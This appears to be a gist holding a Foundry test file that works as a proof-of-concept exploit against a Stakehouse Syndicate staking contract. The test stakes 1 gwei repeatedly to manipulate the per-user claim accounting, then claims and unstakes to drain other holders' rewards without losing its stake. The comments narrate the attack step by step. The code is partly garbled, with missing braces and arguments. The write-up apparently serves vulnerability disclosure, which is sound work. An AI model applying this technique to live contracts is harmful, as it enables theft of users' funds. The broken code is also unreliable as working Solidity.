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Created November 14, 2022 21:43
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Theft of claims of free floating SLOT holders
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import { console } from "forge-std/console.sol";
import { MockERC20 } from "../../contracts/testing/MockERC20.sol";
import { SyndicateMock } from "../../contracts/testing/syndicate/SyndicateMock.sol";
import { MockAccountManager } from "../../contracts/testing/stakehouse/MockAccountManager.sol";
import { MockTransactionRouter } from "../../contracts/testing/stakehouse/MockTransactionRouter.sol";
import { MockSlotRegistry } from "../../contracts/testing/stakehouse/MockSlotRegistry.sol";
import { MockStakeHouseUniverse } from "../../contracts/testing/stakehouse/MockStakeHouseUniverse.sol";
import { SyndicateFactoryMock } from "../../contracts/testing/syndicate/SyndicateFactoryMock.sol";
import {
} from "../../contracts/syndicate/SyndicateErrors.sol";
import { TestUtils } from "../utils/TestUtils.sol";
contract SyndicateTest is TestUtils {
MockERC20 public sETH;
SyndicateFactoryMock public syndicateFactory;
SyndicateMock public syndicate;
function blsPubKeyOneAsArray() public view returns (bytes[] memory) {
bytes[] memory keys = new bytes[](1);
keys[0] = blsPubKeyOne;
return keys;
function sendEIP1559RewardsToSyndicate(uint256 eip1559Reward) public {
(bool success, ) = address(syndicate).call{value: eip1559Reward}("");
assertEq(success, true);
function setUp() public {
// Deploy an sETH token for an arbitrary stakehouse
sETH = new MockERC20("sETH", "sETH", accountOne);
// Deploy the syndicate but no priority stakers are required
address[] memory priorityStakers = new address[](0);
// Create and inject mock stakehouse dependencies
address accountMan = address(new MockAccountManager());
address txRouter = address(new MockTransactionRouter());
address uni = address(new MockStakeHouseUniverse());
address slot = address(new MockSlotRegistry());
syndicateFactory = new SyndicateFactoryMock(
address payable _syndicate = payable(syndicateFactory.deployMockSyndicate(
0, // No priority staking block
syndicate = SyndicateMock(_syndicate);
// Config mock stakehouse contracts
MockSlotRegistry(syndicate.slotReg()).setShareTokenForHouse(houseOne, address(sETH));
MockStakeHouseUniverse(syndicate.uni()).setAssociatedHouseForKnot(blsPubKeyOne, houseOne);
MockStakeHouseUniverse(syndicate.uni()).setAssociatedHouseForKnot(blsPubKeyTwo, houseOne);
MockStakeHouseUniverse(syndicate.uni()).setAssociatedHouseForKnot(blsPubKeyThree, houseOne);
MockSlotRegistry(syndicate.slotReg()).setNumberOfCollateralisedSlotOwnersForKnot(blsPubKeyOne, 1);
MockSlotRegistry(syndicate.slotReg()).setNumberOfCollateralisedSlotOwnersForKnot(blsPubKeyTwo, 1);
MockSlotRegistry(syndicate.slotReg()).setNumberOfCollateralisedSlotOwnersForKnot(blsPubKeyThree, 1);
MockSlotRegistry(syndicate.slotReg()).setCollateralisedOwnerAtIndex(blsPubKeyOne, 0, accountTwo);
MockSlotRegistry(syndicate.slotReg()).setCollateralisedOwnerAtIndex(blsPubKeyTwo, 0, accountFour);
MockSlotRegistry(syndicate.slotReg()).setCollateralisedOwnerAtIndex(blsPubKeyThree, 0, accountFive);
MockSlotRegistry(syndicate.slotReg()).setUserCollateralisedSLOTBalanceForKnot(houseOne, accountTwo, blsPubKeyOne, 4 ether);
MockSlotRegistry(syndicate.slotReg()).setUserCollateralisedSLOTBalanceForKnot(houseOne, accountFour, blsPubKeyTwo, 4 ether);
MockSlotRegistry(syndicate.slotReg()).setUserCollateralisedSLOTBalanceForKnot(houseOne, accountFive, blsPubKeyThree, 4 ether);
function testUnexpectedClaimAsStaker() public {
// Set up test - distribute sETH and register additional knot to syndicate
sETH.transfer(accountThree, 500 ether);
sETH.transfer(accountFive, 500 ether);
// for bls pub key one we will have 2 stakers staking 50% each
uint256 stakingAmount = 4 ether;
uint256[] memory sETHAmounts = new uint256[](1);
sETHAmounts[0] = stakingAmount;
sETH.approve(address(syndicate), stakingAmount);
syndicate.stake(blsPubKeyOneAsArray(), sETHAmounts, accountOne);
sETH.approve(address(syndicate), stakingAmount);
syndicate.stake(blsPubKeyOneAsArray(), sETHAmounts, accountThree);
// send some rewards
uint256 eipRewards = 1 ether;
// The attack starts at this stage
assertEq(accountThree.balance, 0);
syndicate.claimAsStaker(accountThree, getBytesArrayFromBytes(blsPubKeyOne));
// at this stage the rewards are expected but let see if we can grab some more...
assertEq(accountThree.balance, eipRewards / 4);
// By sending the minimum amount of gwei, I can diminish `sETHUserClaimForKnot` which is used in the calculation in `calculateUnclaimedFreeFloatingETHShare`
// that eventually drives the staker claims.
sETHAmounts[0] = 1 gwei;
// we record the balance of sETH to check eventually that we have not lost anything the invested amount to perform the attack.
uint256 sETHBalanceBefore = sETH.balanceOf(accountThree);
sETH.approve(address(syndicate), sETHAmounts[0]);
// and stake the minimum amount to manipulate `sETHUserClaimForKnot`.
syndicate.stake(blsPubKeyOneAsArray(), sETHAmounts, accountThree);
// claim again and check if we collected more. Yes, we doubled...
syndicate.claimAsStaker(accountThree, getBytesArrayFromBytes(blsPubKeyOne));
assertEq(accountThree.balance, eipRewards / 2);
// now we can unstake the invested amount
syndicate.unstake(accountThree, accountThree, blsPubKeyOneAsArray(), sETHAmounts);
assertEq(accountThree.balance, eipRewards / 2);
uint256 sETHBalanceAfter = sETH.balanceOf(accountThree);
// let see if we can do some more. Yes, we can... So that way we could drain all rewards...
sETH.approve(address(syndicate), sETHAmounts[0]);
syndicate.stake(blsPubKeyOneAsArray(), sETHAmounts, accountThree);
syndicate.claimAsStaker(accountThree, getBytesArrayFromBytes(blsPubKeyOne));
assertEq(accountThree.balance, (eipRewards / 4) * 3);
// check that the balance of sETH is as before the attack, we have not lost anything during the attack.
assertEq(sETHBalanceAfter, sETHBalanceBefore);
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